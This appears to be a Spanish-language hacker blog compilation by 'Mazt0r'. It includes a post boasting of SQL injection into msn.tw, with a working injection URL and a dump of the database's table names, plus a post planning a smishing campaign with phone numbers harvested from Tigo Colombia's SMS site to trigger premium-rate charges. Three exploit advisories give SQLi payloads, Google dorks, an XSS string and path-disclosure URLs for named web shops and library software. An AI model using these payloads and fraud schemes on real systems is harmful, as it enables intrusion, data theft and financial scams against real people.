Bueno, por hay con un bro de ddlr nos pusimos a intentar el ingreso a MSN.TW de la cual es ironico que tenga un directorio tan mugre y a la vez usando PHP y MYSQL , sin embargo decidimos explorar mas debido a que es muy llamativo todo este escenario.
Msn.tw

Iniciamos asi:
http://www.msn.tw/softball/gamedetail.php?gameseq=218+and+1=0+union+select+version%28%29,1,2,3,4,5,6,7,8,9,10,11--

De hay comenzamos a sacar la data...
Info basica

Apache
PHP/5.2.13
PleskLin
MySQL >=5
5.0.90

Dbs's:

information_schema
msn
test

Db Principal:

accesslog
album
board
forum
game
lotto_539
mem
open_account
open_article
open_article_content
open_article_content_d
open_board
open_collect
open_keyword
open_tracking
open_violate
photo
record
record_2005
record_2006
record_2007
record_2009
record_2010
record_2011
record_2012
redir_conf
reserve
static
static_2005
static_2006
static_2007
static_2009
static_2010
static_2011
static_2012
team
user
webcont
-----------------------------------------------------------------------------------
Despues de realizar todo esto dieron ganas de subir shell, pero no logre el objetivo, intente en paneles loguearme y logre pero nada interesante aunqu cabe aclarar que no era necesario sacar user debido a que el panel tenia bypasse.. el Uploader no servia de mucho que digamos.
PANEL CON BYPASSE

Aburrido solo me puse a explotar XSS en el foro...
http://www.msn.tw/softball/forum.php

Apoyo ---------------------------------
Black-Mantic Blaron , 5TU4RT

Bueno, con mucha inactividad debido a mis estudios no he generado entradas consecutivamente. Para no perder la costumbre quiero compartirles unos PDF's sobre Armas mini, en pocas palabras esos Gadgets de destruccion que tanto nos atraen.



Mini weapons of mass destruction: Build Implements of Spitball Warfare #1 Sinopsis: Mini weapons of mass destruction (abreviado MWMD) es un archivo .pdf con 257 paginas con armas como ballestas,catapultas,etc.y todo esto con materiales que todos tenemos como rollos de papel,lapices,lapiceras,etc.
Autor: John Austin Google Book: Link
Descarga libro completo en PDF: Multiupload
Descarga libro completo en PDF MIRROR #2: DepositFiles
Descarga libro completo en PDF MIRROR #3: Filefactory





Mini weapons of mass destruction: Build a Secret Agent Arsenal #2

Sinopsis Chicago Review Press | English | 2011 | 256 pages | PDF | 15 MB
Autor: John Austin
Si usted es un espía en ciernes, ¿qué mejor manera de ocultar sus actividades clandestinas de la miniaturización de su arsenal de agente secreto? MiniWeapons de destrucción masiva 2 se presenta completamente ilustradas paso a paso las instrucciones para la construcción de 30 armas diferentes espía y herramientas de vigilancia, incluyendo: * Documento de Dart Watch • Pluma Pistola de aire * Rubber Band Derringer • Casa de la Moneda Catapulta de estaño * Pushpin Dart • Esponja de algodón .38 Especial * Pasta de dientes Periscopio • Papel Estrella lanzada * Bionic Ear • ¡Y más!
Google Book: Link
Descarga libro completo en PDF: Multiupload
Descarga libro completo en PDF MIRROR #2: DepositFiles
Descarga libro completo en PDF MIRROR #3: Filefactory

Bonus Targets
Pequeño PDF que contiene varios targets para probar tus creaciones.
Descargar: link

Primero que nada...

Que es SMISHING??

El SMiShing es un término informático para denominar un nuevo tipo de delito o actividad criminal usando técnicas de ingeniería social empleado mensajes de texto dirigidos a los usuarios de Telefonía móvil. El SMiShing es una variante del phishing.

Segun la wikipedia.

-----------------------------------------------------------------------------------------------

La objetividad del articulo...

Sin nada que hacer me puse a analizar un poco el sistema de SMS via web del proveedor de telefonia movil "TIGO" la cual analice un rato, hasta llegar con una variable muy llamativa.

?orden=1 <--Dirigida por client.php

Que me imprimio el siguiente texto: session=8923


Al ver una variable de ese tipo, lo primero que se viene a la mente es buscar BUGS, SQLI por cierto.. pero encontre algo muy curioso al cambiar el valor a 2.


Al final.. es un total de 10724, interesante ya podemos deducir que tenemos DATA FRESH! para iniciar una secuencia de SPAM.


Ahora solo nos falta programarnos un Script que nos ayude a lanzar un SMS a toda la data, preferiblemente algo de pHP por cuRL hacia un servidor usado para estos fines o un script en perl mediante uso de credenciales POST hacia algun servicio dedicado para los SMS ejemplo: PINGER.

El problema es que Pinger solo acepta 1 Numero para enviar SMS y no se puede adherir un listado de 10 K como el anterior. pero.. por script se podria...!


SMISHING directo..

Bueno el SMISHING directo consiste en coger numeros al azar ya sea 3 o 4 y realizar un tipo de ing social para obtener un beneficio final, este es mas complicado por que al ser de pocas cantidades se requiere de paciencia, creatividad y buena ing social.

Escenario SMISHING DIRECTO:

Como muchos sabran los servicios Online que ofrecen SMS gratuitos o pagos a nivel mundial te generan un numero de respuesta (NO TODOS) el cual puede ser confuso para el receptor.

De que sirve que sea confuso??

Un usuario receptor no le parecera real un supuesto premio que viene de un numero similar al de el.. en pocas palabras otro NUM de CEL de el usuario comun.

En cambio si le envias un SMS con un numero muy poco usual este creera que es de la empresa proveedora de telefonia o un target especifico para realizar el SMISHING.

EJEMPLO: BANCO, CANALES, RADIO etc


Pruebas...
Los numeros en colombia son del tipo: 300-xxx-xxxx
En la imagen podemos notar un numero poco comun entre los receptores de SMS y al notar este creera que es proveniente de una fuente benigna.


Se puede notar que al recibir este, se le pide al usuario que conteste mediante un SMS al 6667 el cual es un sistema de SMS de cobro que se ha configurado previamente para cobrar grandisimas sumas.


Entonces podemos deducir que.. las empresas de telefonia no toman las medidas necesarias para que nuestros numeros de cel se mantengan privados a terceros en la red, El caso anterior en el cual se muestra como TIGO imprime una gran cantidad de numeros 100% REALES y servibles para los que se dedican al SMISHING, que trae como consecuencia usuarios con perdida de dinero incluso otra clase de problemas aislados a lo economico.



VULNERABLE TARGET: http://mensajito.tigo.com.co/mensajito/client.php?orden=2
TYPE: Information Disclosure

PWNED TIGO!

# Author: Mazt0r
# Exploit Title: Online Shop SQLI
# Date: 04 DE MARZO DE 2012
# software: LeKommerce
# link: http://www.lekommerce.com/
# Version: "ESPECIFIC VERSION NO TESTED"
# Category: Commerce online
# Tested on: Linux

D0rk: inurl:secc.php?id=

DEMO
=====================================
Exploit :
======================
http://localhost/path/secc.php?id={sqli}
======================
Example:
======================
http://localhost/path/secc.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7--
http://localhost/path/secc.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7+from+information_schema.tables--
======================
dbs:
======================
+--------------------------------+
| t_clientes |
| t_colores |
| t_colores_idiomas |
| t_configuracionglobal |
| t_emailing |
| t_emailingcliente |
| t_facturascompra |
| t_facturasventa |
| t_familias |
| t_familias_idiomas |
| t_formaspago |
| t_idiomas |
| t_incidencias |
| t_iva |
| t_marcas |
| t_menusuperior |
| t_noticias |
| t_productos |
| t_productos_idiomas |
| t_proveedores |
| t_provincias |
| t_rel_productos_tallas_colores |
| t_rel_tallas_colores |
| t_seccionesproductos |
| t_seccionesproductos_idiomas |
| t_series |
| t_subfamilias |
| t_subfamilias_idiomas |
| t_tallas |
| t_tallas_idiomas |
| t_tiposperfiles |
| t_traducciones |
| t_usuarios |
+--------------------------------+

PASSWD: TEXT PLAIN? <<<--- SECURE? EPIC!

----------------------------------
PANEL ADMIN: [/lib/validar_index.php]
----------------------------------
Blog: maztor.blogspot.com
Twitter: @Mazt0r
----------------------------------

OSVDB
EXPLOIT DB LINK
PACKET-STORM LINK
SECUNIA LINK

# Author: Mazt0r
# Exploit Title: XSS & Full Path Disclosure SIABUC
# Date: 24/02/2012
# software: SIABUC
# link: http://siabuc.ucol.mx/
# Version: Version 1.2 [Other versions "NO TESTED"]
# Category: webapps Library
# Tested on: Linux

Demo:http://www.cidcacs.iis.ucr.ac.cr/

----------------
Vulnerable
----------------
/reservacion/index.php
/reservacion/include/buscar.php

Exploit:
======================

http://localhost/reservacion/index.php

POST: XSS
Result: /reservacion/include/buscar.php
======================
Example:
======================

|---------------------|
|" > < h1 > A < / h1 >|
|---------------------|
\
- Execution Code

Result FPD: Notice: Trying to get property of non-object in C:\ABCSIS\Reservacion\include\buscarws.php on line ***


"© Derechos reservados 2010, Universidad de Colima. Página desarrollada por el departamento de SIABUC"

----------------------------------
Blog: maztor.blogspot.com
Twitter: @Mazt0r
----------------------------------

LINK: Report

# Author: Mazt0r
# Exploit Title: Full path disclosure and Sql Error ONLINE SHOP IGT
# Date: 24/02/2012
# software: IGT Online Shop
# link: http://www.igt.com.hk
# Version: ALL
# Category: webapps
# Google dork: inurl:company_index.php
# Tested on: Linux



----------------
Vulnerability
----------------

Exploit:
======================

http://localhost/path/company_index.php?id=[ID#NUMBER]&file=home&prod=&uid=[FPD & ERROR SQL]

======================
Example:
======================

http://Mazt0rsite.com/company_index.php?id=245&file=home&prod=prod&uid=

Result FPD: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/Mazt0rsite/path/path2/public_html/company_index.php on line 3

Regular Result2: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 [PWNED XD]



----------------------------------
Blog: maztor.blogspot.com
Twitter: @Mazt0r
----------------------------------
======================== Camaradas! DDLR & CL ===============================================
Greetz : zer0-zo0rg | Zeux0r | SeguridadBlanca | k4rl | Pum4 | TheLatin | 4t0m1x | Destroyer
-------------------------------------------------------------------------------------------===


LINK: Exploit

Bueno, debido a mi reciente ingreso a la universidad me temo que al estar en un ambiente nuevo, no se aun a lo que me enfrento, en referencia a esto me dedicare estas semanas iniciales al estudio para coger campo y no distraerme de forma externa, una vez me haya acostumbrado seguire escribiendo los articulos como se venia haciendo anteriormente.

Saludos! Espero me comprendan.